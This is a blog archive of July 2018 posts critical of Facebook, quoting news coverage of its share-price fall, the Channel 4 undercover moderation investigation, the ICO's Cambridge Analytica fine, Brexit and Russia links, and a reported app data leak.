Showing posts with label Facebook. Show all posts
Showing posts with label Facebook. Show all posts

Monday 30 July 2018

July 2018 was not a good month for Zuckerberg and Facebook Inc - Channel 4 undercover investigation, a lawsuit, falling user numbers, sudden 19% drop in company value & US$12 billion hit to personal fortune


As the fall-out from manipulated US presidential campaign and UK Brexit national referendum continues try at it might Facebook Inc just can't give a cursory apology for its part in these events and mover on - users and mainstream media won't cease scutiny of its business practices.

News.com.au, 27 July 2018:

Shares in Facebook plummeted 19 per cent to $US176.26 at the end of trading on Thursday, wiping out some $US120 billion ($A160 billion) — believed to be the worst single-day evaporation of market value for any company....

Founder Mark Zuckerberg, who has a 13 percent stake in Facebook, saw his fortune dropped by more than $US12 billion ($A16 billion) in less than 24 hours, to around $74 billion ($A100 billion).

The fall came after the social media giant revealed three million European users had closed their accounts since the Cambridge Analytica data scandal. The record decline pushed the tech-heavy Nasdaq more than one per cent lower.

CNet, 27 July 2018:

It began Wednesday with Facebook, which announced that daily active user counts had fallen in Europe, to 279 million from 282 million earlier this year. Facebook also indicated it was no longer growing in the US and Canada, two of the most lucrative advertising markets. Just as Facebook was working through its second year of nearly nonstop scandals over unchecked political meddling and data misuse, it was becoming clear that the days of consistent and relatively easy growth were fading.

Reuters, 28 July 2018:

NEW YORK (Reuters) - Facebook Inc (FB.O) and its chief executive Mark Zuckerberg were sued on Friday in what could be the first of many lawsuits over a disappointing earnings announcement by the social media company that wiped out about $120 billion of shareholder wealth.

The complaint filed by shareholder James Kacouris in Manhattan federal court accused Facebook, Zuckerberg and Chief Financial Officer David Wehner of making misleading statements about or failing to disclose slowing revenue growth, falling operating margins, and declines in active users.

Chanel4.com, news release, 17 July 2018:

Dispatches investigation reveals how Facebook moderates content

An undercover investigation by Firecrest Films for Channel 4 Dispatches has revealed for the first time how Facebook decides what users can and can’t see on the platform. (Inside Facebook: Secrets of the Social Network, Channel 4 Dispatches, 9pm, 17 July)
Dispatches’ investigation reveals:
       *Violent content such as graphic images and videos of assaults on children, remaining on the site, despite being flagged by users as inappropriate and requests to have it removed.

·         *Thousands of reported posts remained unmoderated and on the site while we were filming, beyond Facebook’s stated aim of a 24-hour turnaround, including potentially posts relating to suicide threats and self-harm.

·        * Moderators told not to take any action if content shows a child who is visibly below Facebook’s 13-year-old age limit, rather than report it as posted by underage users, even if the content includes self-harming.

·         *Allegations from an early Facebook investor and mentor to Mark Zuckerberg, that Facebook’s business model benefits from extreme content which engages viewers for longer, generating higher advertising revenue.

·         *Pages belonging to far-right groups, with large numbers of followers, allowed to exceed deletion threshold, and subject to different treatment in the same category as pages belonging to governments and news organisations.

·       *  Policies allowing hate speech towards ethnic and religious immigrants, and trainers instructing moderators to ignore racist content in accordance with Facebook’s policies.

      Dispatches sent an undercover reporter to work as a content moderator in Facebook’s largest centre for UK content moderation. The work is outsourced to a company called Cpl Resources plc in Dublin which has worked with Facebook since 2010. The investigation reveals the training given to content moderators to demonstrate how to decide whether content reported to them by users, such as graphic images and videos of child abuse, self-harming, and violence should be allowed to remain on the site or be deleted. Dispatches also films day-to-day moderation of content on the site, revealing:
      Violent content:
      One of the most sensitive areas of Facebook’s content rulebook is about graphic    violence. When dealing with graphic violence content, moderators have three options – ignore, delete, or mark as disturbing which places restrictions on who can see the content.
      Dispatches’ undercover reporter is seen moderating a video showing two teenage schoolgirls fighting. Both girls are clearly identifiable and the video has been shared more than a thousand times. He’s told that Facebook’s rules say that because the video has been posted with a caption condemning the violence and warning people to be careful about visiting the location where it was filmed, it should not be deleted and instead should be left on the site and marked as disturbing content. Dispatches speaks to the mother of the girl involved who tells the programme the distress and impact the video had on her daughter. She struggles to understand the decision to leave the video up on the site. “To wake up the next day and find out that literally the whole world is watching must have been horrifying. It was humiliating for her, it was devastating for her. You see the images and it’s horrible, it’s disgusting. That’s someone’s child fighting in the park. It’s not Facebook entertainment.”

      Facebook told Dispatches that the child or parent of a child featured in videos like this can ask them to be removed. Richard Allan, VP of Public Policy at Facebook said, “Where people are highlighting an issue and condemning the issue, even if the issue is painful, there are a lot of circumstances where people will say to us, look Facebook, you should not interfere with my ability to highlight a problem that’s occurred.

      Online anti-child abuse campaigner Nicci Astin tells Dispatches about another violent video which shows a man punching and stamping on a toddler. She says she reported the video to Facebook in 2012 and received a message back saying it didn’t violate its terms and conditions. The video is used during the undercover reporter’s training period as an example of what would be left up on the site, and marked as disturbing, unless posted with a celebratory caption. The video is still up on the site, without a graphic warning, nearly six years later. Facebook told Dispatches they do escalate these issues and contact law enforcement, and the video should have been removed.

      One moderator tells the Dispatches undercover reporter that “if you start censoring too much then people lose interest in the platform…. It’s all about making money at the end of the day.”
      Venture Capitalist Roger McNamee was one of Facebook’s earliest investors, a mentor to CEO Mark Zuckerberg, and the man who brought Sheryl Sandberg to the company. He tells Dispatches that Facebook’s business model relies on extreme content:
      “From Facebook’s point of view this is, this is just essentially, you know, the crack cocaine of their product right. It’s the really extreme, really dangerous form of content that attracts the most highly engaged people on the platform. Facebook understood that it was desirable to have people spend more time on site if you’re going to have an advertising based business, you need them to see the ads so you want them to spend more time on the site. Facebook has learned that the people on the extremes are the really valuable ones because one person on either extreme can often provoke 50 or 100 other people and so they want as much extreme content as they can get.”

      Richard Allan told Dispatches: Shocking content does not make us more money, that’s just a misunderstanding of how the system works …. People come to Facebook for a safe secure experience to share content with their family and friends. The vast majority of those 2 billion people would never dream of sharing content that, like that, to shock and offend people. And the vast majority of people don’t want to see it. There is a minority who are prepared to abuse our systems and other internet platforms to share the most offensive kind of material. But I just don’t agree that that is the experience that most people want and that’s not the experience we’re trying to deliver.

      Underage users:
      No child under 13 can have a Facebook account. However, a trainer tells the undercover reporter not to proactively take any action regarding their age if the report contains an image of a user who is visibly underage, unless the user admits to being underage: “We have to have an admission that the person is underage. If not, we just like pretend that we are blind and we don’t know what underage looks like.” Even if the content contains images for self-harm for example, and the image is of someone who looks underage the user is treated like an adult and sent information about organisations which help with self-harming issues, rather than being reported for being underage: “If this person was a kid, like a 10-year-old kid we don’t care, we still action the ticket as if they were an adult.” Facebook confirmed to Dispatches that its policy is not to take action about content posted by users who appear to be underage, unless the user admits to being underage.

Hate speech:
       Dispatches’ undercover reporter is told that, while content which racially abuses protected ethnic or religious groups violates Facebook’s guidelines, if the posts racially abuse immigrants from these groups, then the content is permitted. Facebook’s training for moderators also includes a post including a cartoon comment which describes drowning a girl if her first boyfriend is a negro, as content which is permitted. Facebook confirmed to Dispatches that the picture violates their hate speech standards and they are reviewing what went wrong to prevent it from happening again.

     “Shielded Review” – Popular pages kept up despite violations:
Our undercover reporter is told that if any page is found to have five or more pieces of content that violate Facebook’s rules, then the entire page should be taken down, in accordance with the company’s policies. But we have discovered that posts on Facebook’s most popular pages, with the highest numbers of followers, cannot be deleted by ordinary content moderators at Cpl. Instead, they are referred to the Shielded Review Queue where they can be directly assessed by Facebook rather than Cpl staff. These pages include those belonging to jailed former English Defence League leader Tommy Robinson, who has over 900,000 followers, and who has been given the same protected status as Governments and news organisations. A moderator tells the undercover reporter that the far-right group Britain First’s pages were left up despite repeatedly featuring content that breached Facebook’s guidelines because, “they have a lot of followers so they’re generating a lot of revenue for Facebook. The Britain First Facebook page was finally deleted in March 2018 following the arrest of deputy leader Jayda Fransen.
      Facebook confirmed to Dispatches that they do have special procedures for popular and high profile pages, which includes Tommy Robinson and included Britain First.
      They say Shielded Review has been renamed ‘Cross Check’. Lord Allen told Dispatches: “if the content is indeed violating it will go….I want to be clear this is not a discussion about money, this is a discussion about political speech. People are debating very sensitive issues on Facebook, including issues like immigration. And that political debate can be entirely legitimate. I do think having extra reviewers on that when the debate is taking place absolutely makes sense and I think people would expect us to be careful and cautious before we take down their political speech.”
      Delays in moderating content:
      Facebook’s publicly stated aim is to assess all reported content within 24 hours. However, during the period of the undercover filming, Dispatches found a significant backlog. Moderators told the undercover reporter that due to the volume of reports, or tickets, they are supposed to moderate, they are unable to check up to 7,000 reported comments on a daily basis. At one point there is a backlog of 15,000 reports which have not been assessed, with some tickets are still waiting for moderation up to five days after being reported. Facebook told Dispatches that the backlog filmed in the programme was cleared by 6 April.
…/ends
[my yellow highlighting]

Wednesday 25 July 2018

The two very different faces Facebook Inc presents to potential advertisers and lawmakers



Australian Newspaper History Group Newsletter, No 98, July 2018, pp8-9:

98.2.3 Facebook described itself as a ‘publisher’ in 2013

Facebook described itself as a “publisher” as far back as 2013, leaked documents obtained by the Australian reveal. This contradicts the message that chief executive Mark Zuckerberg gave to US Congress, in interviews and in speeches (Australian, 9 July 2018). A 71-page PowerPoint presentation prepared by the then managing director of Facebook, Stephen Scheeler, outlines how the tech giant was the “second-highest reaching publisher in Australia” when compared with traditional media companies such as Nine and Seven. The internal sales document is partly based on data gathered by measurement firm Nielsen as well as confidential internal figures including quarterly revenue targets. There is no mention of Facebook being a publisher in Nielsen’s original report; it categorises Facebook as a “brand” in its Online Landscape Review published in May 2013. A slide in the presentation produced by Scheeler, the most senior executive at Facebook’s Australia and New Zealand business at the time, changed Nielsen’s description of Facebook from a brand to a “publisher”, showing that the social media giant views itself as such.

This is significant because Facebook has long argued it is a tech platform, not a publisher or a media company, when questioned about how it has generated vast profits by siphoning off billions of dollars from the news industry. The admission in the document contrasts with Facebook’s recent public contribution to a high-powered Australian inquiry into the local digital media market. The company repeatedly calls itself a “platform” in a 56-page written submission to the Australian Competition & Consumer Commission.

Zuckerberg has persistently rejected the suggestion that Facebook is a publisher, presenting the company as a neutral platform that does not have traditional journalistic responsibilities. In April, Zuckerberg was asked by US senators investigating the Cambridge Analytica data scandal to explain whether his company was a tech company or publisher. Dan Sullivan, a Republican Senator for Alaska, said: “That goes to an important question about what regulation or action, if any, we would take.” Asked by Senator Sullivan if Facebook was a “tech company or the world’s largest publisher” during his second day of testimony on Capitol Hill, the Facebook co-founder responded: “I view us as a tech company because the primary thing that we do is build technology and products.” Senator Sullivan pressed further: “You said you’re responsible for your content, which makes you kind of a publisher, right?” Zuckerberg did not admit Facebook was a media company or publisher, but did say it was responsible for what is posted on its platforms after it emerged that the company allowed Russia to spread disinformation in the US presidential election.

“I agree that we’re responsible for the content. But we don’t produce the content. I think that when people ask us if we’re a media company or a publisher, my understanding of what the heart of what they’re really getting at is: do we feel responsible for the content on our platform? The answer to that I think is clearly yes. But I don’t think that that’s incompatible with fundamentally at our core being a technology company where the main thing that we do is have engineers and build products.”

Friday 20 July 2018

Slowly but surely Russian connections between the UK Brexit referendum campaign and the US presidential campaign are beginning to emerge


“We have concluded that there are risks in relation to the processing of personal data by many political parties. Particular concerns include: the purchasing of marketing lists and lifestyle information from data brokers without sufficient due diligence, a lack of fair processing, and use of third party data analytics companies with insufficient checks around consent….We have looked closely at the role of those who buy and sell personal data-sets in the UK. Our existing investigation of the privacy issues raised by their work has been expanded to include their activities in political processes….The investigation has identified a total of 172 organisations of interest that required engagement, of which around 30 organisations have formed the main focus of our enquiries, including political parties, data analytics companies and major social media platforms…..Similarly, we have identified a total of 285 individuals relating to our investigation.” [UK Information Commissioner’s Office, Investigation into the use of data analytics in political campaigns: Investigation update, July 2018]

Slowly but surely the Russian connections between the UK Brexit referendum campaign and the US presidential campaign are beginning to emerge.

The Guardian, 15 July 2018:

A source familiar with the FBI investigation revealed that the commissioner and her deputy spent last week with law enforcement agencies in the US including the FBI. And Denham’s deputy, James Dipple-Johnstone, confirmed to the Observer that “some of the systems linked to the investigation were accessed from IP addresses that resolve to Russia and other areas of the CIS [Commonwealth of Independent States]”.

It was also reported that Senator Mark Warner, vice chair of US Senate Intel Committee and Damian Collins MP, chair of the Digital, Culture, Media and Sport select committee inquiry into “fake news”, met in Washington on or about 16 July 2018 to discuss Russian interference in both British and American democratic processes during an Atlantic Council meeting.

UK Information Commissioner’s Office (ICO), media release, 10 July 2018:

Information Commissioner Elizabeth Denham has today published a detailed update of her office’s investigation into the use of data analytics in political campaigns.
In March 2017, the ICO began looking into whether personal data had been misused by campaigns on both sides of the referendum on membership of the EU.

In May it launched an investigation that included political parties, data analytics companies and major social media platforms.

Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.

Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.
The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.
Facebook has a chance to respond to the Commissioner’s Notice of Intent, after which a final decision will be made.

Other regulatory action set out in the report comprises:

warning letters to 11 political parties and notices compelling them to agree to audits of their data protection practices;

an Enforcement Notice for SCL Elections Ltd to compel it to deal properly with a subject access request from Professor David Carroll;

a criminal prosecution for SCL Elections Ltd for failing to properly deal with the ICO’s Enforcement Notice;

an Enforcement Notice for Aggregate IQ to stop processing retained data belonging to UK citizens;

a Notice of Intent to take regulatory action against data broker Emma’s Diary (Lifecycle Marketing (Mother and Baby) Ltd); and
audits of the main credit reference companies and Cambridge University Psychometric Centre.

Information Commissioner Elizabeth Denham said:
“We are at a crossroads. Trust and confidence in the integrity of our democratic processes risk being disrupted because the average voter has little idea of what is going on behind the scenes.

“New technologies that use data analytics to micro-target people give campaign groups the ability to connect with individual voters. But this cannot be at the expense of transparency, fairness and compliance with the law.

She added:
“Fines and prosecutions punish the bad actors, but my real goal is to effect change and restore trust and confidence in our democratic system.”

A second, partner report, titled Democracy Disrupted? Personal information and political influence, sets out findings and recommendations arising out of the 14-month investigation.

Among the ten recommendations is a call for the Government to introduce a statutory Code of Practice for the use of personal data in political campaigns.

Ms Denham has also called for an ethical pause to allow Government, Parliament, regulators, political parties, online platforms and the public to reflect on their responsibilities in the era of big data before there is a greater expansion in the use of new technologies.

She said:
“People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.”

In addition, the ICO commissioned research from the Centre for the Analysis of Social Media at the independent thinktank DEMOS. Its report, also published today, examines current and emerging trends in how data is used in political campaigns, how use of technology is changing and how it may evolve in the next two to five years. 

The investigation, one of the largest of its kind by a Data Protection Authority, remains ongoing. The 40-strong investigation team is pursuing active lines of enquiry and reviewing a considerable amount of material retrieved from servers and equipment.

The interim progress report has been produced to inform the work of the DCMS’s Select Committee into Fake News.

The next phase of the ICO’s work is expected to be concluded by the end of October 2018.

The Washington Post, 28 June 2018:

BRISTOL, England — On Aug. 19, 2016, Arron Banks, a wealthy British businessman, sat down at the palatial residence of the Russian ambassador to London for a lunch of wild halibut and Belevskaya pastila apple sweets accompanied by Russian white wine.

Banks had just scored a huge win. From relative obscurity, he had become the largest political donor in British history by pouring millions into Brexit, the campaign to disentangle the United Kingdom from the European Union that had earned a jaw-dropping victory at the polls two months earlier.

Now he had something else that bolstered his standing as he sat down with his new Russian friend, Ambassador Alexander Yakovenko: his team’s deepening ties to Donald Trump’s insurgent presidential bid in the United States. A major Brexit supporter, Stephen K. Bannon, had just been installed as chief executive of Trump’s campaign. And Banks and his fellow Brexiteers had been invited to attend a fundraiser with Trump in Mississippi.

Less than a week after the meeting with the Russian envoy, Banks and firebrand Brexit politician Nigel Farage — by then a cult hero among some anti-establishment Trump supporters — were huddling privately with the Republican nominee in Jackson, Miss., where Farage wowed a foot-stomping crowd at a Trump rally.
Banks’s journey from a lavish meal with a Russian diplomat in London to the raucous heart of Trump country was part of an unusual intercontinental charm offensive by the wealthy British donor and his associates, a hard-partying lot who dubbed themselves the “Bad Boys of Brexit.” Their efforts to simultaneously cultivate ties to Russian officials and Trump’s campaign have captured the interest of investigators in the United Kingdom and the United States, including special counsel Robert S. Mueller III.

Vice News, 11 June 2018:

Yakovenko is already on the radar of special counsel Robert Mueller, who is investigating Russian interference in the U.S. presidential election, after he was named in the indictment of ex-Trump campaign aide George Papadopoulos….

Banks, along with close friend and former Ukip leader Nigel Farage, was among the very first overseas political figures to meet Trump after his surprise victory in November 2016.

It also emerged over the weekend that Banks passed contact information for Trump’s transition team to the Russians.

Sunday 15 July 2018

"Bad actor" Facebook Inc given £500,000 maximum fine - any future breach may cost up to £1.4bn


The Guardian, 11 July 20018:

Facebook is to be fined £500,000, the maximum amount possible, for its part in the Cambridge Analytica scandal, the information commissioner has announced.

The fine is for two breaches of the Data Protection Act. The Information Commissioner’s Office (ICO) concluded that Facebook failed to safeguard its users’ information and that it failed to be transparent about how that data was harvested by others.

 “Facebook has failed to provide the kind of protections they are required to under the Data Protection Act,” said Elizabeth Denham, the information commissioner. “Fines and prosecutions punish the bad actors, but my real goal is to effect change and restore trust and confidence in our democratic system.”

In the first quarter of 2018, Facebook took £500,000 in revenue every five and a half minutes. Because of the timing of the breaches, the ICO said it was unable to levy the penalties introduced by the European General Data Protection (GDPR), which caps fines at the higher level of €20m (£17m) or 4% of global turnover – in Facebook’s case, $1.9bn (£1.4bn). The £500,000 cap was set by the Data Protection Act 1998.

As one of the IT whistleblowers described the situation...

Sunday 1 July 2018

So what has Facebook Inc been up to lately?


Everything from admitting to further data breaches, to altering images, to supressing legitimate content, to considering payment for access, to shareholder revolt, it seems......

The Herald Sun reported on 9 June 2018 at p.59:

Facebook is ­embroiled in another data privacy scandal, confirming a software bug led to the private posts of 14 million users being made public.

According to Facebook, the bug was active from May 18 to May 27 and changed the privacy settings of some users without telling them.

“Today we started letting the 14 million people affected know — and asking them to review any posts they made during that time,” Facebook chief privacy officer Erin Egan said.

“To be clear, this bug did not impact anything people had posted before, and they could still choose their audience just as they always have.” It was unclear yesterday how many Australian users were affected. Facebook said the bug occ­urred during the development of a new share function that ­allowed users to share featured items on their profile page, such as a photo.

“The problem has been fixed, and for anyone affected, we changed the audience back to what they’d been using before,” Ms Egan said.

Facebook has urged affected customers to review posts made between May 18 and May 27 to see if any private posts had been automatically made public.

The latest issue comes as Facebook chief Mark Zuckerberg faces the prospect of a public grilling before the Aus­tralian parliament’s intelligence and security committee.
Facebook admitted this week it had struck data partnerships — where it shares the personal data of people on the social media platform — with at least four Chinese electronics companies, including Huawei Technologies.

Huawei has been barred from a series of major projects in Australia over concerns about its close links to the Chinese government.

Members of the parliamentary intelligence and security committee want Mr Zuckerberg to come to Australia and answer questions about the data-sharing pact.

On 18 June 2018 The Sun reported that Facebook Inc had begun to manipulate images – effectively producing ‘fake images’ that were being passed off a real.

Then on 20 June 2018 Facebook Inc. declared its intention to charge certain private group users for participation on its platforms:

Today, we’re piloting subscriptions with a small number of groups to continue to support group admins who lead these communities.

This world-wide social platform apparently expects that if it formally launches this access fee (reportedly up to $360 a year) then these costs to be passed on as subscription fees – with Facebook  letting administrators charge subscription fees from $4.99 to $29.99 each month to join premium subgroups containing exclusive posts.

Presumably, if the market responds in sufficient numbers then Facebook will change the rules and demand that private groups hand over a percentage of subscription fees collected.

The Guardian, 24 June 2018:

George Orwell wrote in his essay Politics and the English Language: “In our age there is no such thing as ‘keeping out of politics’. All issues are political issues.” 

When Facebook constructed a new archive of political advertising, had it thought a little more about this concept of what is “political”, it might have more accurately anticipated the subsequent Orwellian headache. As it is, journalists are finding their articles restricted from promotion because they are lumped in with campaigning materials from politicians, lobby groups and advocacy organisations.

The new archive of ads with political content, which Facebook made public last month, has become the latest contested piece of territory between platforms and publishers. The complaint from publishers is that Facebook is categorising posts in which they are promoting their own journalism (paying money to target particular groups of the audience) as “political ads”. Publishers have reacted furiously to what they see as toxic taxonomy.

Mark Thompson, the chief executive of the New York Times, has been the most vocal critic, describing Facebook’s practices as “a threat to democracy” and criticising the platform in a recent speech to the Open Markets Initiative in Washington DC. “When it comes to news, Facebook still doesn’t get it,” said Thompson. “In its effort to clear up one bad mess, it seems to be joining those who want to blur the line between reality-based journalism and propaganda.”

At a separate event at Columbia University, Thompson and Facebook’s head of news partnerships, Campbell Brown, fought openly about the initiative. Thompson showed examples of where New York Times articles, including recipes, had been wrongly flagged as political. Brown emphasised that the archive was being refined, but stood firm on the principle that promoted journalism ought to be flagged as “paid-for” political posts. “On this you are just wrong,” she told Thompson.

Publishers took to social platforms to question the labelling and representation of their work. One of the most egregious examples came from investigative journalism organisation Reveal. Last week, at the height of the scandal around the separation of undocumented migrant families crossing the US border, it published an exclusive story involving the alleged drugging of children at a centre housing immigrant minors. It was flagged in the Facebook system as containing political content, and as Reveal had not registered its promotion of the story, the promoted posts were stifled. Facebook did not remove the article, but rather stopped its paid circulation. Given the importance of paid promotion, it is not surprising that publishers see this as amounting to the same thing.

And trust issues can be found both inside and outside Facebook's castle walls.....

Business Insider, 24 June 2018:

A Survata study, seen exclusively by Business Insider, asked US consumers to rate big tech companies from one (most trusted) to five (least trusted). Survata surveyed more than 2,600 people in April and May. It’s the first time Survata has carried out the survey.

The results show that Facebook is nowhere near as trusted as Amazon, PayPal, or Microsoft – but that people do trust it more than Instagram. Instagram, of course, is owned by Facebook.

Here’s the top 15 in order of most to least trusted:
1 .Amazon
2. PayPal
3. Microsoft
4. Apple
5. IBM
6. Yahoo
7. Google
8. YouTube
9. eBay
10. Pandora
11. Facebook
12. LinkedIn
13. Spotify
14. AOL
15. Instagram

Business Insider, 26 June 2018:

Shareholders with nearly $US3 billion invested Facebook are trying to topple Mark Zuckerberg as chairman and tear up the company’s governance structure.

Business Insider has spoken with six prominent shareholders who said there was an unprecedented level of unrest among Facebook’s backers following a series of scandals.

They are in open revolt about Zuckerberg’s power base, which gives him the ability to swat away any shareholder proposal he disagrees with.

 One investor compared him to a robber baron, a derogatory term for 19th-century US tycoons who accumulated enormous wealth.

Facebook says its governance structure is “sound and effective” and splitting Zuckerberg’s duties as chairman and CEO would cause “uncertainty, confusion, and inefficiency.”

Finally, it was reported on 29 June 2018 by IT News that, you guessed it, yet another Facebook sponsored personality test was allowing data to be extracted without the users knowledge or informed consent:

A security researcher has found that a popular personality test app running on Facebook contained an easily exploitable flaw that could be used to expose sensitive information on tens of millions of users.

Belgian security researcher Inti De Ceukelaire joined Facebook's bug bounty program, set up by the giant social network after the Cambridge Analytica data leak scandal and tried out the NameTests.com's personality test app developed by Social Sweethearts.

De Ceukelaire discovered that when he loaded a personality test, NameTests.com fetched his personal data from Facebook and displayed it on a webpage.

He was shocked to see that users' personal data was wrapped in a Javascript file by NameTests.com, which could be accessed via a weblink over the plain text HTTP protocol.

This meant that any website that requested the file could access the personal information retrieved from users' Facebook accounts.

The security researcher tested this by setting up a website that connected to NameTests.com and was able to access Facebook posts, photos and friend lists belonging to visitors.

Information leaked included people's Facebook IDs, first and last names, languages used, gender, date of birth, profile pictures, cover photo, currency, devices used, and much more.

Worse, De Ceukelaire found that NameTests.com doesn't log off users which means the site would continue to leak user data even after the app was deleted.